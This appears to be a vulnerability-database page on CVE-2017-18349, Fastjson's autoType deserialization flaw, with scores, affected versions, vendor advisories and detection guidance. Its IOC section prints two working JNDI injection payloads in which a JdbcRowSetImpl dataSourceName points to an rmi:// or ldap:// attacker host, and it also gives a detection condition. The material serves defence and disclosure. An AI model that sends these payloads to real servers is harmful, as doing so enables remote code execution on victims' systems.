CVE-2017-18349
published 2018-10-23CVE-2017-18349: parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a…
PriorityP186critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
38.97%
98.4th percentile
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alibaba | fastjson | < 1.2.48 | 1.2.48 |
| alibaba | fastjson | < 1.2.25 | 1.2.25 |
| pippo | pippo | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/api/json
url/parse
url/deserialize
command{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://<attacker>/", "autoCommit": true}
command{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://<attacker>/", "autoCommit": true}
othercom.sun.rowset.JdbcRowSetImpl
sigma
condition: contains(interactsh_protocol,'dns') AND contains(content_type,'application/json') AND contains_all(body,'autoCommit','set property error')
- →Look for HTTP POST requests to /json, /api/json, /parse, or /deserialize endpoints with Content-Type: application/json containing the @type key set to com.sun.rowset.JdbcRowSetImpl and a dataSourceName field containing an rmi:// or ldap:// URI pointing to an attacker-controlled host. ↗
- →Detect the error response string 'set property error' alongside 'autoCommit' in the response body, which indicates the vulnerable Fastjson code path was triggered.
- →Monitor for outbound DNS or LDAP/RMI connections originating from the Java process after receiving a JSON payload containing @type with com.sun.rowset.JdbcRowSetImpl — this indicates successful JNDI injection triggering an out-of-band callback.
- →Flag any JSON body containing the literal string @type with value com.sun.rowset.JdbcRowSetImpl regardless of nesting depth (top-level, inside 'data' key, or inside 'b' key), as the exploit template demonstrates multiple wrapping variants.
- →This vulnerability exists because of Fastjson's autoType feature mishandling @type keys; detection should also cover LDAP-based JNDI injection payloads in the dataSourceName field, as the same class is exploitable via ldap:// URIs. ↗
- ·The Nuclei template uses interactsh (OOB/OAST) for DNS callback detection; this detection method requires an active interactsh server and will not fire in air-gapped or DNS-filtered environments.
- ·The exploit is demonstrated against Pippo's /json endpoint but the vulnerable parseObject function is in Fastjson itself; any application using Fastjson before 1.2.25 with autoType enabled is affected regardless of framework or endpoint path. ↗
- ·The fix in 1.2.25 was incomplete; Fastjson before 1.2.48 remains vulnerable to autoType mishandling leading to JNDI injection, and a further bypass is tracked as CVE-2022-25845. ↗
- ·The stop-at-first-match flag in the Nuclei template means only the first matching endpoint is tested per request sequence; in production scanning, all candidate paths (/json, /api/json, /parse, /deserialize) should be tested independently.
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
fastjson: Fastjson: Remote Code Execution via JNDI Injection due to autoType mishandling
vendor_redhat·2026-01-09·CVSS 9.8
CVE-2025-70974 [CRITICAL] CWE-829 fastjson: Fastjson: Remote Code Execution via JNDI Injection due to autoType mishandling
fastjson: Fastjson: Remote Code Execution via JNDI Injection due to autoType mishandling
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
A flaw was found in Fastjson, a popular Java library for converting Java objects to JSON and vice versa. This vulnerability allows a remote attacker to execute arbitrary code on
OSV
FASTJSON Includes Functionality from Untrusted Control Sphere
osv·2026-01-09·CVSS 9.8
CVE-2025-70974 [CRITICAL] FASTJSON Includes Functionality from Untrusted Control Sphere
FASTJSON Includes Functionality from Untrusted Control Sphere
Fastjson before 1.2.48 mishandles autoType because, when an `@type` key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
GHSA
FASTJSON Includes Functionality from Untrusted Control Sphere
ghsa·2026-01-09·CVSS 9.8
CVE-2025-70974 [CRITICAL] CWE-829 FASTJSON Includes Functionality from Untrusted Control Sphere
FASTJSON Includes Functionality from Untrusted Control Sphere
Fastjson before 1.2.48 mishandles autoType because, when an `@type` key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
VulnCheck
alibaba fastjson Inclusion of Functionality from Untrusted Control Sphere
vulncheck·2025·CVSS 9.8
CVE-2025-70974 [CRITICAL] alibaba fastjson Inclusion of Functionality from Untrusted Control Sphere
alibaba fastjson Inclusion of Functionality from Untrusted Control Sphere
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
Affected: alibaba fastjson
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploit
GHSA
Improper Input Validation in alilibaba:fastjson
ghsa·2018-10-24
CVE-2017-18349 [CRITICAL] CWE-20 Improper Input Validation in alilibaba:fastjson
Improper Input Validation in alilibaba:fastjson
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
OSV
Improper Input Validation in alilibaba:fastjson
osv·2018-10-24
CVE-2017-18349 [CRITICAL] Improper Input Validation in alilibaba:fastjson
Improper Input Validation in alilibaba:fastjson
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
VulnCheck
alibaba fastjson Improper Input Validation
vulncheck·2017·CVSS 9.8
CVE-2017-18349 [CRITICAL] alibaba fastjson Improper Input Validation
alibaba fastjson Improper Input Validation
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
Affected: alibaba fastjson
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2017-18349; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=
No detection rules found.
Nuclei
Fastjson Insecure Deserialization - Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-18349 [CRITICAL] Fastjson Insecure Deserialization - Remote Code Execution
Fastjson Insecure Deserialization - Remote Code Execution
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
Template:
id: CVE-2017-18349
info:
name: Fastjson Insecure Deserialization - Remote Code Execution
author: night
severity: critical
description: |
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP PO
https://fortiguard.com/encyclopedia/ips/44059https://github.com/alibaba/fastjson/wiki/security_update_20170315https://github.com/pippo-java/pippo/issues/466https://fortiguard.com/encyclopedia/ips/44059https://github.com/alibaba/fastjson/wiki/security_update_20170315https://github.com/pippo-java/pippo/issues/466
2018-10-23
Published
Exploited in the wild